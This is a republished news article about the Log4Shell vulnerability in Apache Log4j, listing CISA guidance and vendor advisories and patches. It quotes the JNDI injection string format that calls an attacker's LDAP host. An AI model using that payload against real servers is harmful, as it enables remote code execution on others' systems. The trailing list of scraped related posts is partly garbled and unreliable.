Log4j: List of vulnerable products and vendor advisories – BleepingComputer

List of Log4j vulnerability advisories, patches, and updates

News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday.

Log4j is an open-source Java logging framework part of the Apache Logging Services used at enterprise level in various applications from vendors across the world.

Apache released Log4j 2.15.0 to address the maximum severity vulnerability, currently tracked as CVE-2021-44228, also referred to as Log4Shell or LogJam.

While massive exploitation started only after exploit code became freely available, attacks have been detected since the beginning of the month, according to data from Cloudflare and Cisco Talos.

The Log4Shell flaw was reported by Alibaba’s Cloud security team on November 24 and it is unclear how some attackers were able to exploit it this soon.

In a statement on Saturday on the Log4Shell vulnerability, Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), says that the agency is working with partners in the private and public sector to address the issue.

“We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability” – Jen Easterly, Director of CISA

Log4Shell is a Java Naming and Directory Interface (JNDI) injection that allows unauthenticated remote code execution. Adversaries can leverage it by changing the user-agent in their browser to a string in the following format: ${jndi:ldap://[attacker_URL]}.

The string will remain in the victim web server’s logs and will force a callback or request to the attacker’s URL when the Log4j library parses it. Attackers can use the string to pass encoded commands or Java classes to the vulnerable machine.

Advisories, notices, patches, or updates

Given the severity of the vulnerability and how easy it is to exploit it, CISA today released guidance for companies to set up defenses against Log4Shell attacks. The agency’s recommendation is to “apply available patches immediately” and to prioritize this process.

“Prioritize patching, starting with mission critical systems, internet-facing systems, and networked servers. Then prioritize patching other affected information technology and operational technology assets” – CISA

If patching is not possible, the agency recommends the following change:

Set log4j2.formatMsgNoLookups to true by adding the string -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting an application

This comes with the caveat that the system’s logging may be impacted if it relies on Lookups for message formatting. Also, the mitigation works only for versions 2.10 and later.

Immediately after details about Log4Shell became known, vendors started to investigate if their products are impacted and provided information about the results:

Amazon:

Amazon has updated several of its products to use a non-vulnerable version of the Log4j component and announced that it is either in the process of updating others or will release new versions in the near future.

The company has published details specific for affected services, among them being OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass, and API Gateway.

Atlassian:

Based on its assessment, the company believes that no on-premise products are vulnerable to exploitation in their default configuration.

Modifying the default logging configuration (log4j.properties) to enable the JMS Appender functionality may bring the risk of remote code execution in some products, like Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, and Crucible.

Broadcom:

The company published mitigations and knowledgebase articles for several Symantec products affected by the Log4j vulnerability. These include CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub, and Symantec Endpoint Protection Manager (SEPM).

Cisco:

Cisco has published a list of its products affected by Log4Shell along with a calendar for patching some of them starting December 14.

Affected products are from various categories, including the following:

  • Network and content security devices (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
  • Collaboration and social media (Cisco Webex Meetings Server)
  • Network management and provisioning (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
  • Enterprise routing and switching (Cisco Network Assurance Engine and Cisco SD-WAN vManage)

Citrix:

While the investigation is still underway and the status may change for some of its products, Citrix has not listed any of its products as being vulnerable to Log4Shell.

ConnectWise:

The company’s cloud service, Perch, was found to rely on third-party components that were “potentially vulnerable,” reads an advisory from ConnectWise.

The vulnerable third-party was identified as FortiGuard’s FortiSIEM, which is used by ConnectWise’s StratoZen solution, prompting the company to temporarily restricting access to the hosted StratoZen servers. Access is now restored to most of the services.

cPanel:

A forum thread shows that only instances where the cPanel Solr plugin is present are affected and could be exploited, but only locally.

A staff member provided additional piece of mind announcing that an update with mitigation for Log4Shell is available to the cpanel-dovecot-solr package.

Debian:

The patched Log4j package has been added to Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), and 12 (Bookworm) as a security update, reads the advisory.

Docker:

A dozen Docker Official images have been found to use a vulnerable version of the Log4j library. The list includes couchbase, elasticsearch, logstash, sonarqube, and solr.

Docker says that it is “in the process of updating Log4j 2 in these images to the latest version available” and that the images may not be vulnerable for other reasons.

FortiGuard:

An advisory from the company lists almost a dozen of its products as being vulnerable, with fixes or mitigations already deployed for four of them.

FortiGuard announced that the advisory would be updated with the dates for applying fixes for other products, such as FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy, and ShieldX.

F-Secure:

Both Windows and Linux versions of several F-Secure products are impacted by Log4Shell: Policy Manager (only the Policy Manager Server component), Policy Manager Proxy, Endpoint Proxy, and Elements Connector.

The company has created a security patch for administrators to correct the issue and provided step-by-step instructions to deploy it.

Ghidra:

The open-source reverse engineering tool from the NSA received an update to version 10.1 that also upgrades the Log4j dependency to a non-vulnerable iteration.

IBM:

IBM’s advisory for Log4Shell shows that only WebSphere Application Server versions 9.0 and 8.5 were affected by the vulnerability, via the Admin Console and the UDDI Registry Application components, and that the issue has been addressed.

Juniper Networks:

The networking company disclosed that four of its products are impacted: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder, and Paragon Planner.

While the assessment continues, at this stage another six products may be affected: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics, and Security Director (not Security Director Insights)

McAfee:

The company has yet to complete its assessment and has 12 products under review and will update the advisory with relevant information as it becomes available.

MongoDB:

Only MongoDB Atlas Search needed to be patched against Log4Shell, the company notes in an advisory updated today

The developer adds that it found no evidence of exploitation or indicators of compromise before deploying the patch.

Okta:

Okta released updates for Okta RADIUS Server Agent and Okta On-Prem MFA Agent to mitigate the risk from the Log4Shell vulnerability and strongly recommends customers to apply the fixes from the Admin Console.

Oracle:

Oracle said that “a number” of its products, without disclosing which ones or how many, are using a vulnerable version of the Log4j component.

The company referred its customers to the My Oracle Support Document and released a security alert with a strong recommendation to apply the provided updates “as soon as possible.”

OWASP Foundation:

An advisory on Friday revealed that versions of the Zed Attack Proxy (ZAP) web app scanner below 2.11.1 use a vulnerable Log4j component.

Red Hat:

Components in multiple Red Hat products are affected by Log4Shell, the organization disclosed on Friday, strongly recommending customers to apply the updates as soon as they become available.

Among the products listed in the advisory are Red Hat OpenShift 4 and 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8, and Red Hat Fuse 7.

SolarWinds:

Two products from the company use a vulnerable version of Apache Log4j: Server & Application Monitor (SAM) and Database Performance Analyzer (DPA).

However, both products use a version of the Java Development Kit (JDK) that is either not susceptible to the Logj4 vulnerability or reduces the risk.

SonicWall:

An investigation that is ongoing revealed that SonicWall’s Email Security version 10.x is impacted by the Log4Shell vulnerability. A fix is under development and should be released “shortly.”

Five other products from SonicWall are still under review and the rest of them have been found not to be impacted by the issue, according to an advisory from the company last updated on Saturday.

Splunk:

Core Splunk Enterprise is not affected unless Data Fabric Search is used. The company published a table with the versions of its products affected by Log4Shell both in the cloud and on-premise.

At the time of writing, the company has released fixes for some products and is currently working on rolling updates for at least seven of its products.

VMware:

VMware has fixed several of its products vulnerable to Log4Shell attacks and is currently working to roll out patches for another 27 products.

In an advisory last updated today, the company lists nearly 40 of its products as impacted by the critical vulnerability. Many of them show a “Patch Pending” and mitigations are available in some cases.

Ubiquiti:

The UniFi Network Application, which uses the Log4j library, has been updated to address the critical Log4Shell vulnerability.

Ubuntu:

The Log4j package has been patched upstream, reads the security advisory, and the update now has to trickle to Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo), and 21.10 (Impish Indri).

Zoho:

The company found that the ADAudit Plus component for auditing Active Directory changes, which is part of the ManageEngine monitoring solution is vulnerable to Log4Shell attacks.

In a short post today, Zoho has provided instructions to mitigate the issue.

Zscaler:

Zscaler has patched several of its products that used a vulnerable version of the Log4j library. After patching all of its Private Access (ZPA) services facing the public internet, Zscaler Mobile Admin, and Support Mobile Admin components, the company concluded that the issue has been fixed in all its products.

Some companies may choose not to take action against Log4Shell vulnerability believing that running certain Java versions diffuses any exploit attempt. This is not true, though, and they should update the Log4j library to its most recent iteration.

Márcio Almeida, senior security engineer at Canva graphic design platform warns that Log4Shell attacks work with any version of Java when adding support for LDAP serialized payloads in the JNDI exploit kit.

The researcher explains that for the attack to work with any version of Java the classes used in the serialized payload need to be in the application classpath.

Source of this news: https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/

Related posts:

'Neurevt' Trojan Targets Mexican Banking concern Customers - BankInfoSecurity. apresentando
Account Takeover Fraud , Cybercrime , Fraud Remedies & Cybercrime Updated Malware This time Includes Spyware and a Backdoor Prajeet Nair ( @prajeetspeaks ) • June 19, 2021 &nbs...
New differential fuzzing tool reveals novel HTTP request smuggling techniques - The Daily Swig
White paper systematically examines the attack while showcasing a ‘laundry list’ of new flaws Researchers have released a new fuzzing tool used for finding novel HTTP request smuggling techni...
Dallas Invents: 129 Patents Granted for Week of March 22 » Dallas Innovates - dallasinnovates.com
Dallas Invents is a weekly look at U.S. patents granted with a connection to the Dallas-Fort Worth-Arlington metro area. Listings include patents granted to local assignees and/or those with a N...
Using Microsoft's YARP project to proxy web-based microservices - OmniChannel Media
Inner source is the idea of using open source techniques to develop internal tools, using platforms such as GitHub for collaboration. Engineers across a company identify common issues and technologi...
Roshan announces release of VPN feature for its Edge Browser to protect users' data 1st Digital Info...
Microsoft Windows’ Default Technique, Edge obtaining a inserted VPN for hiding users’ IP address. Much like other internet browsers namely Opera and Baidu browsers, the Microsoft Restive is also go...
Form N-PX LEUTHOLD FUNDS INC For: Jun 30 - StreetInsider.com
Get inside Wall Street with StreetInsider Premium. Claim your 1-week free trial here. UNITED STATES SECURITIES AND EXCHANGE COMMISSION WASHINGTON, D.C. 20549 FORM N-PX ANNUAL REPORT OF PROXY VOTIN...
X-Force Threat Intelligence: Monthly Malware Roundup - Security Intelligence
X-Force Threat Intelligence: Monthly Malware Roundup <!-- --> Today’s reality means that organiz...
Everything you need to know about data extraction - Flux Magazine
words Alexa Wang Data is being generated more than ever. The main reasons for that are the development of digital technologies and the internet, and it’s an excellent opportunity for businesses worl...
Apple is turning privacy into a business advantage, not just a marketing slogan - CNBC
Tim CookSource: AppleApple unveiled new versions of its operating systems on Monday which showed that the company's focus on privacy has taken a new turn. It's not just a corporate ideal or a marketi...
Vulnerability Could Expose HAProxy to HTTP Request Smuggling Attack | eSecurityPlanet - eSecurity Pl...
A critical vulnerability discovered in the open-source load balancer and proxy server HAProxy could enable bad actors to launch an HTTP Request Smuggling attack, which would let them bypass security ...
Sprott Announces Third Quarter 2021 Results - Financial Post
Breadcrumb Trail Links GlobeNewswire Author of the article: GlobeNewswire Article content TORONTO, Nov. 05, 2021 (GLOBE NEWSWIRE) — Sprott Inc. (NYSE/TSX: SII) (“Sprott” or the “Com...
Why Should You Use Residential Proxies? - TheNationRoar
Source: wonderfulengineering.com Proxies are widely used in today’s business matters that are carried out online. The main question to ask is not why that is the case but rather why you are not using...
Market rotation persists, S&P 500 capped by the breakdown point - MarketWatch
U.S. stocks are mixed Wednesday, vacillating as Treasury yields continue to stabilize in the wake of largely uneventful Federal Reserve policy remarks. Against this backdrop, the S&P 500 remains...
Unable to remove proxy server 127.0.0.1:86. - Virus, Trojan, Spyware, and Malware Removal Help - Ble...
Hi there, I hope I can get some help on this issue as I have tried everything I can . I am stuck with this proxy server http://127.0.0.1:86/ which I cannot remove. I have tried in rege...
Valheim dedicated server setup: How to host and join dedicated servers explained - Eurogamer.net
Setting up a Valheim dedicated server is recommended if you want to get godlike bandwidth and enter ping Valhalla when playing with friends.With over two million copies sold and hundreds of thousands...
Blake Snell Tries To Become Extraordinary Again - FanGraphs
On Friday night in San Diego, the Padres got an all-too rare glimpse of the version of Blake Snell that they hoped they had traded for in December. Facing the Mets — admittedly, an injury-weakened ve...
PRIVATE can't connect to P2P activities, but other devices on a single network can. - Web 2 . - Blee...
Hello! I am having difficulty connecting to peer to peer game such as Risk of Rain 8 and Gunfire Reborn.   I have worked with all sorts of fixes. 1 . Started up ports on both router an...
I would say the 100 Greatest Music Motion picture Artists of All Time: Staff Inventory - Billboard
Why She's a Video Icon:   It's going to take no more than 10 seconds find out you’re watching a Sia video – an impressive accomplishment considering she rarely, when, appears herself. Teen...

IP Rotating Proxy Onsale

SPECIAL LIMITED TIME OFFER

00
Months
00
Days
00
Hours
00
Minutes
00
Seconds
First month free with coupon code FREE30